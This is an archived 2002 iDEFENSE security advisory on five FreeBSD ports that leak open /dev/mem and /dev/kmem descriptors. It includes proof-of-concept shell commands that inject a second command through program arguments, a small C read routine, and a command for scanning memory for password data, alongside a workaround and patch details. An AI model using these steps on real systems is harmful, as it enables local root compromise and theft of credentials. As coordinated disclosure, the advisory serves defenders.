iDEFENSE Security Advisory 09.16.2002: FreeBSD Ports libkvm Security Vulnerabilities

• Previous message: NetBSD Security Officer: "NetBSD Security Advisory 2002-006: buffer overrun in libc/libresolv DNS resolver"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

iDEFENSE Security Advisory 09.16.2002 
FreeBSD Ports libkvm Security Vulnerabilities


DESCRIPTION

The FreeBSD ports asmon, ascpu, bubblemon, wmmon, and wmnet2 
can be locally manipulated to take advantage of open file 
descriptors /dev/mem and /dev/kmem to gain root privileges on 
a target host. These five programs are installed setgid kmem 
by default. They will drop kmem privileges before executing 
user specified commands but file descriptors to /dev/mem and 
/dev/kmem will remain open. This can lead to a local root 
compromise in various ways (e.g. if an attacker chooses to 
scan for the master password file in the Linux kernel memory).


ANALYSIS

The latest versions of all five above mentioned FreeBSD ports 
are vulnerable, the following examples illustrate the 
problems: 

bash-2.05a$ bubblemon "dummy&/usr/local/sbin/lsof|grep 
dummy|grep mem"

dummy 688 dim 4r VCHR 2,0 0t0 21146 /dev/mem
dummy 688 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem


bash-2.05a$ ascpu -exe "dummy&/usr/local/sbin/lsof|grep dummy|grep
mem" 

dummy 650 dim 4r VCHR 2,0 0t0 21146 /dev/mem
dummy 650 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem


bash-2.05a$ cat .wmmonrc 
left "/home/dim/dummy" 
bash-2.05a$ wmmon & 
[1] 793 
bash-2.05a$ Monitoring 5 devices for activity. 
current stat is :1 

bash-2.05a$ /usr/local/sbin/lsof |grep dummy|grep mem 
dummy 797 dim 3r VCHR 2,0 0t0 21146 /dev/mem 
dummy 797 dim 4r VCHR 2,1 0xc040f54c 21145 /dev/kmem 


bash-2.05a$ wmnet2 -e "dummy&/usr/local/sbin/lsof|grep 
dummy|grep mem"
wmnet: using kmem driver to monitor ec0
dummy 584 dim 3r VCHR 2,0 0t0 21146 /dev/mem
dummy 584 dim 4r VCHR 2,1 0xc037cb8f 21145 /dev/kmem 


One possible exploit for these vulnerabilities is to replace 
getch() in strings(1) with: 

int getch() 
{
char buf[4];
read(4,buf,1);
return buf[0];
}

or a similar less CPU expensive function that reads a 
character from the /dev/mem file descriptor and execute the 
following:

wmnet2 -e exploit|grep root|grep Charlie 


DETECTION

The latest copies of asmon, ascpu, bubblemon, wmmon, and 
wmnet2 from the FreeBSD ports collection are vulnerable and 
were tested on 4.6-RELEASE of FreeBSD.  According to FreeBSD, 
all FreeBSD ports that use libkvm prior to and including 
4.6.2-RELEASE may also be vulnerable.


WORKAROUND

Remove the setgid bit on the affected applications, 
however reducing the functionality:

chmod g-s /path.to/wmnet2 


VENDOR RESPONSE

The FreeBSD advisory to be released in coordination with this 
advisory is FreeBSD-SA-02:39.libkvm.  FreeBSD has provided
the following patch details:

"Upgrade your vulnerable system to 4.6-STABLE; or to the 
RELENG_4_6, RELENG_4_5, or RELENG_4_4 security branch dated 
after the correction date (4.6.2-RELEASE-p2, 4.5-RELEASE-p20, 
or 4.4-RELEASE-p27)."


DISCLOSURE TIMELINE

August 12, 2002 - Disclosed to iDEFENSE
September 6, 2002 - Disclosed to FreeBSD Security
September 6, 2002 - Disclosed to iDEFENSE clients
September 16, 2002 - Coordinated public disclosure by FreeBSD
		      and iDEFENSE


CREDIT

This issue was exclusively disclosed to iDEFENSE by 
badc0dedat_private

http://www.idefense.com/contributor.html



David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071

dendlerat_private
www.idefense.com

• Next message: Michael Stone: "[SECURITY] [DSA-136-2] Multiple OpenSSL problems (update)"
• Previous message: NetBSD Security Officer: "NetBSD Security Advisory 2002-006: buffer overrun in libc/libresolv DNS resolver"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Sep 17 2002 - 20:44:40 PDT